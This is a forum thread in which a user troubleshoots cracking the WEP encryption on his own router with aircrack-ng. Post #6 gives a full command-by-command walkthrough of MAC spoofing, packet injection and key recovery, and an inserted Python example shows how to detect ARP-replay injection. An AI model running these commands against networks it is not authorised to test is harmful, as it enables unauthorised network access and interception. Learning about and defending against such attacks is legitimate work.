
Thread: My WEP not so insecure?

  1. #1
    squishyalt (Member, Join Date Feb 2010, Posts 172)

    My WEP not so insecure?

    Looking at the videos online and such, I was starting to believe the hype that WEP can be cracked in under 3 minutes.

    Well, mine can't -- unless I'm really screwing something up.

    I have a Netgear WNR864M router with WEP/128 bit, Automatic Authentication Type (I guess it chooses automatically between shared key and open system since they are the 2 other options in the drop down). The key in the router is actually B4582CDB412BD1BB00849F4A57.

    I have collected 145,129 IVs so far - and nothing is coming out of aircrack-ng. I am using Aircrack-ng 1.0 beta r857 and a Hawking USB wireless device with the RT73 chipset.

    I have noticed that there is a significant slow down in gathering IVs (as compared to just starting up). Router is 3 feet from rausb0 and the other PC surfing via WEP connection is about 3 feet away.

    Is there a difference in WEPs that makes some hackable in 3 minutes whereas mine is still hanging in after 30+ minutes?

    I have another PC connected wirelessly via my router to generate some traffic and I am listening to streaming radio and surfing on that PC - to help generate some traffic.

    Did I misunderstand all of those videos about hacking WEP in 10, 5 or even 3 minutes?

    To be perfectly clear, this is what I did......

    Code:
    airmon-ng stop rausb0  (success)
    macchanger --mac 00:11:22:33:44:55 rausb0  (success)
    airmon-ng start rausb0  (rausb0 reports in monitor mode)
    airodump-ng rausb0  (begins successfully)
    (ctrl-c to stop it and get the BSSID)
    airodump-ng -c 9 -w squishytest --bssid 00:14:6C:DE:D1:A8 rausb0 (success)
    aireplay-ng -1 0 -a 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0  (success)
    aircrack-ng -a 1 -b 00:11:22:33:44:55 squishytest-01.cap  (success)
    And.....now here I sit......30+ minutes......and no penetration of the WEP router.

    Am I screwing something up? Are there newer versions of Air* that I should be using? Is there a new driver that would work faster for my RT73 chipset? And, and how could I tell what driver/software versions I even have?

    Thanks for helping me crawl.....

  2. #2
    Senior Member (Join Date Apr 2008, Posts 2,008)

    aircrack-ng -a 1 -b 00:11:22:33:44:55 squishytest-01.cap
    Try this command instead.
    Code:
    aircrack-ng -n 128 squishytest*.cap
    The asterisk is just used in case you have more than one cap file and wish to use them all.

    Is there a difference in WEPs that makes some hackable in 3 minutes whereas mine is still hanging in after 30+ minutes?
    The only difference in WEP encryption that will affect the time it takes to crack the key is its actual length. As you are only using a 128 bit key you should easily be able to crack it in a few minutes. You will also want to make sure that you have gathered a substantial amount of weak IVs before you actually try to crack the key.

    aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    I take it that you mean that you are able to inject packets and can see the amount of data packets in airodump-ng building up rapidly?
    -Monkeys are like nature's humans.

  3. #3
    Junior Member (Join Date Mar 2007, Posts 54)

    I tested against my own network the other day and I got through quite fast.

    I believe it was at around 40k IVs but I could be wrong ...

    If you're new to WEP cracking like myself, I found it was useful to experiment with VirtuelShaman's WEP spoon feeder from hxxp://shamanvirtuel.googlepages.com

  4. #4
    squishyalt (Member, Join Date Feb 2010, Posts 172)

    Whoo Hooooo! I think I got it!

    Remember when I said that I typed

    Code:
    aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0 (success)
    Well, I replaced my faked SSID in the above code with the BSSID of my target and cracked it in just "[00:00:00] Tested 757 keys (got 95726 IVs)" using a completely new IV file. It took less than 3 minutes to gather the data.

    I don't know where I got the idea to use my faked MAC.

    Now, I need to look up how to actually connect to the WEP network and run metasploit and some other testing tools.

    Thanks for the help =Tron= and Pureline!

  5. #5
    Junior Member (Join Date Mar 2007, Posts 54)

    Glad to be of service mate,

    You want to learn to use Autoscan and Nmap (and alike tools) for gathering information on live hosts next.

  6. #6
    squishyalt (Member, Join Date Feb 2010, Posts 172)

    Quote Originally Posted by Pureline View Post
    Glad to be of service mate,

    You want to learn to use Autoscan and Nmap (and alike tools) for gathering information on live hosts next.
    I spoke too soon. I am unable to replicate the successful penetration test.

    I have been working on this for 3 days with no luck.

    Code:
    How to test a WEP network for key vulnerability....

    Get the key for the WEP network.....
     0: Find your wireless device....
        USAGE -- iwconfig MY_WIRELESS_DEVICE
        EXAMPLE OF DEVICE NAMES -- rausb0 OR ath0
        EXAMPLE -- iwconfig rausb0

     1: Stop your wireless device to allow MAC address change.
        USAGE -- airmon-ng stop MY_WIRELESS_DEVICE
        EXAMPLE -- airmon-ng stop rausb0

     2: Set a fake MAC address for your wireless device (use something easy to remember like 00:11:22:33:44:55)
        USAGE -- macchanger --mac FAKE_MAC_ADDRESS MY_WIRELESS_DEVICE
        EXAMPLE -- macchanger --mac 00:11:22:33:44:55 rausb0

     3: Re-start your wireless device in monitor mode - check with iwconfig - run a second time if needed
        USAGE -- airmon-ng start MY_WIRELESS_DEVICE
        EXAMPLE -- airmon-ng start rausb0

     6: Start airodump-ng to find the network (BSSID, channel and encryption protocol) that you want to test.
        USAGE -- airodump-ng MY_WIRELESS_DEVICE
        EXAMPLE -- airodump-ng rausb0

     7: Stop airodump-ng and copy the target network's BSSID
        USAGE -- {ctrl-c stops airodump-ng, then highlight, right click and click copy on the data}
        EXAMPLE OF BSSID TO COPY -- 00:14:6C:DE:D1:A8

     8: Save your IV data to a file.  This data is used to figure out the WEP key.
        USAGE -- airodump-ng -c TARGET_CHANNEL_# -w NEW_DATA_FILENAME --bssid TARGET_BSSID MY_WIRELESS_DEVICE
        EXAMPLE -- airodump-ng -c 9 -w testingwep --bssid 00:14:6C:DE:D1:A8 rausb0

     9: In a separate shell window - fake authentication on the target network.
        USAGE -- aireplay-ng -1 0 -a TARGET_BSSID -h MY_FAKED_MAC_ADDRESS MY_WIRELESS_DEVICE
        EXAMPLE -- aireplay-ng -1 0 -a 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0

    10: Make ARP requests to the target to generate traffic.
        USAGE -- aireplay-ng -3 -b TARGET_BSSID -h MY_FAKED_MAC_ADDRESS MY_WIRELESS_DEVICE
        EXAMPLE -- aireplay-ng -3 -b 00:14:6C:DE:D1:A8 -h 00:11:22:33:44:55 rausb0

    11: In a separate shell window - crack the WEP key (your data filename from step 8 will have a # and ".cap" added to its end).
        USAGE -- aircrack-ng -a 1 -b TARGET_BSSID NEW_DATA_FILENAME
        EXAMPLE -- aircrack-ng -a 1 -b 00:14:6C:DE:D1:A8 testingwep-01.cap
        -- Look for "KEY FOUND! [ WEP_KEY ]" in the output.
        -- EXAMPLE OUTPUT : "KEY FOUND! [ B4:58:2C:DB:41:2B:D1:BB:00:84:9F:4A:57 ]"
    I just can't get a WEP key before something like 1.5 million IVs.

    Are there updates to the BT3 beta that I should be installing?


    See anything I'm screwing up?
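    Added example, not code from this thread or from the aircrack-ng project: the ARP-replay step in post #6 (the traffic generation =Tron= asks about in #2) re-sends one captured frame verbatim, so a defender watching a monitor-mode capture can flag it by counting how often the exact same 24-bit IV recurs from one client MAC inside a short window. The frame log, the legitimate client's MAC, the IV values and the threshold below are all constructed; only the BSSID and the spoofed MAC come from the thread.

```python
from collections import defaultdict

# Constructed frame log: (time_s, src_mac, bssid, iv, frame_len). Not a real capture.
BSSID = "00:14:6c:de:d1:a8"    # BSSID quoted in the thread
LEGIT = "00:1a:2b:3c:4d:5e"    # assumed legitimate client (constructed)
INJECT = "00:11:22:33:44:55"   # spoofed MAC used in the thread's commands

def legit_traffic():
    # A normal WEP station picks a fresh IV for every frame it sends.
    return [(i * 0.25, LEGIT, BSSID, 0x100000 + i, 98) for i in range(40)]

def injected_traffic():
    # ARP replay re-sends one captured frame verbatim: same IV, same length, very fast.
    return [(5.0 + i * 0.002, INJECT, BSSID, 0x3A7F12, 68) for i in range(300)]

FRAMES = sorted(legit_traffic() + injected_traffic())

def iv_reuse_alerts(frames, threshold=20, window_s=1.0):
    """Return {(src, bssid, iv): peak_count} for every (station, IV) pair that
    recurs more than `threshold` times inside any `window_s` second window.
    A legitimate client never repeats an IV this often; replay injection does."""
    times = defaultdict(list)
    for t, src, bssid, iv, _ in frames:
        times[(src, bssid, iv)].append(t)
    alerts = {}
    for key, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end, t in enumerate(ts):          # sliding window over the timestamps
            while t - ts[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts[key] = peak
    return alerts

if __name__ == "__main__":
    for (src, bssid, iv), n in iv_reuse_alerts(FRAMES).items():
        print(f"ALERT: {src} -> {bssid} reused IV {iv:06x} {n} times in 1 s (WEP replay injection)")
```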

  7. #7
    squishyalt (Member, Join Date Feb 2010, Posts 172)

    According to the guys at aircrack-ng, I may have uncovered some flaws in aircrack-ng.

    They need a couple of days to look things over.

    I will post here when I hear something.

  8. #8
    squishyalt (Member, Join Date Feb 2010, Posts 172)

    I have downloaded the aircrack virtual machine and tried using their Aircrack-ng 1.0 rc1 1083 code and it presents the same problem.

    So, I know it is not command-, BT3- or update-related. It is almost definitely an issue with aircrack-ng.

    I'll keep you updated.

  9. #9
    Junior Member (Join Date May 2006, Posts 28)

    use BT 3 Final...

    start airodump-ng to get the channel and mac of the router.

    then start spoonwep in the console type spoonwep

    paste the mac of the router in the first box, leave the second box empty..

    choose your adapter and then choose the last option

    usually works pretty quickly...

  10. #10
    Senior Member (Join Date Apr 2008, Posts 2,008)

    Quote Originally Posted by BlayzeX View Post
    use BT 3 Final...

    start airodump-ng to get the channel and mac of the router.

    then start spoonwep in the console type spoonwep

    paste the mac of the router in the first box, leave the second box empty..

    choose your adapter and then choose the last option

    usually works pretty quickly...
    SpoonWEP is only a GUI for aircrack-ng and as squishyalt already seems to be using the correct commands and states that it might be a bug in the program, changing to SpoonWEP should make no difference.

    It would nevertheless be nice to know if the aircrack guys ever did find a problem with the program or if the issue was related to something else, as squishyalt's last post is almost a month old now.
    -Monkeys are like nature's humans.
